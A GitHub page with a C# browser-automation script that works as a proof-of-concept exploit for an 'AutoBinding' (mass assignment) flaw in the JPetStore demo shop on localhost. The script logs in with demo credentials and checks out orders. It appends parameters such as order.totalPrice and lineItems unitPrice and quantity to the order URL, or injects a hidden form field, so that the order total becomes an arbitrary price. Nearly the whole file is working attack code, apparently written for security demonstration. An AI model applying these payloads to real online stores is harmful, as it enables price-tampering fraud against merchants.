Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
branch: master
Fetching contributors…

Cannot retrieve contributors at this time

100 lines (85 sloc) 4.188 kb
var topPanel = "JPetStore 'AutoBinding Vulnerability' PoC".popupWindow(1000,700).insert_LogViewer();
//var topPanel = panel.clear().add_Panel();
var actionPanel = topPanel.insert_Above(40);
var ie = topPanel.add_IE_with_NavigationBar().silent(true);
var server = "http://127.0.0.1.:8080";
ie.open(server + "/jpetstore/shop/signonForm.do");
//ie.inject_FirebugLite();
Action<string,string> login =
(username, password) => {
ie.open(server + "/jpetstore/shop/signonForm.do");
ie.field("username",username);
ie.field("password",password);
ie.eval("document.forms[1].submit()");
ie.waitForComplete();
};
Action loginPlaceAnOrderAndGoToCheckout =
()=>{
ie.open("http://127.0.0.1:8080/jpetstore");
ie.link("Enter the Store").click();
//login if needed
var signOffLink = ie.links().where((link)=> link.url().contains("signonForm.do")).first();
if(signOffLink.notNull())
{
signOffLink.click();
login("j2ee", "pwd1");
}
ie.links().where((link)=> link.url().contains("FISH"))[0].click();
ie.link("FI-FW-01 ").flash().click();
ie.links().where((link)=> link.url().contains("addItemToCart"))[0].flash().click();
ie.links().where((link)=> link.url().contains("checkout.do"))[0].flash().click();
ie.links().where((link)=> link.url().contains("newOrder.do"))[0].flash().click();
};
Action scrollToTotal =
()=>{
var tdElement = ie.elements().elements("TD").toList().Where((element)=> element.innerHtml().notNull() && element.innerHtml().contains("Total:")).first();
tdElement.scrollIntoView();
tdElement.injectHtml_beforeEnd("<h2><p align=right>Look at the Total value from the table above (it should be 18.50)</p><h2>");
};
Action<string> exploit_Variation_1 =
(payload) => {
loginPlaceAnOrderAndGoToCheckout();
//ie.buttons()[1].flash().click();
ie.eval("document.forms[1].submit()");
ie.waitForComplete();
ie.open(server + "/jpetstore/shop/newOrder.do?_finish=true&" + payload);
scrollToTotal();
};
Action<string> exploit_Variation_1_SetTotalPrice =
(totalPrice) => {
var payload = "&order.totalPrice={0}".format(totalPrice);
exploit_Variation_1(payload);
};
Action<string> exploit_Variation_1_SetItemPriceQuantityAndTotalPrice =
(totalPrice) => {
var payload = "&order.totalPrice={0}&order.lineItems[0].unitPrice=12&order.lineItems[0].quantity=12".format(totalPrice);
exploit_Variation_1(payload);
};
Action<string> exploit_Variation_2 =
(totalPrice) => {
loginPlaceAnOrderAndGoToCheckout();
ie.field("order.billToFirstName").flash()
.injectHtml_afterEnd("<br>Total Price:<input type=text name='order.totalPrice' value='{0}'/>".format(totalPrice));
//ie.buttons()[1].flash().click();
ie.eval("document.forms[1].submit()");
ie.waitForComplete();
ie.open("http://127.0.0.1.:8080/jpetstore/shop/newOrder.do?_finish=true");
scrollToTotal();
};
//ie.disableFlashing();
var desiredPrice = "";
actionPanel.add_Label("Desired Total Price:").top(4)
.append_TextBox("").onTextChange((text) => desiredPrice = text).set_Text("1.99")
.append_CheckBox("Disable flashing",(value)=> { if (value) ie.disableFlashing(); else ie.enableFlashing(); })
.append_Link("Normal Request", ()=> exploit_Variation_1("")).top(24).left(105)
.append_Link("Exploit Variation #1 (set TotalPrice) ", ()=> exploit_Variation_1_SetTotalPrice(desiredPrice))
.append_Link("Exploit Variation #2 (set ItemPrice, Item Quantity and TotalPrice) ", ()=> exploit_Variation_1_SetItemPriceQuantityAndTotalPrice(desiredPrice))
.append_Link("Exploit Variation #3 (set TotalPrice) ", ()=> exploit_Variation_2(desiredPrice))
.append_Link("loginPlaceAnOrderAndGoToCheckout; ",()=> loginPlaceAnOrderAndGoToCheckout());
ie.open("http://127.0.0.1.:8080/jpetstore");
//actionPanel.link("Normal Request").click();
login("j2ee", "pwd1");
return "done";
//using FluentSharp.Watin
//O2Ref:FluentSharp.Watin.dll
//O2Ref:Watin.Core.dll
Jump to Line
Something went wrong with that request. Please try again.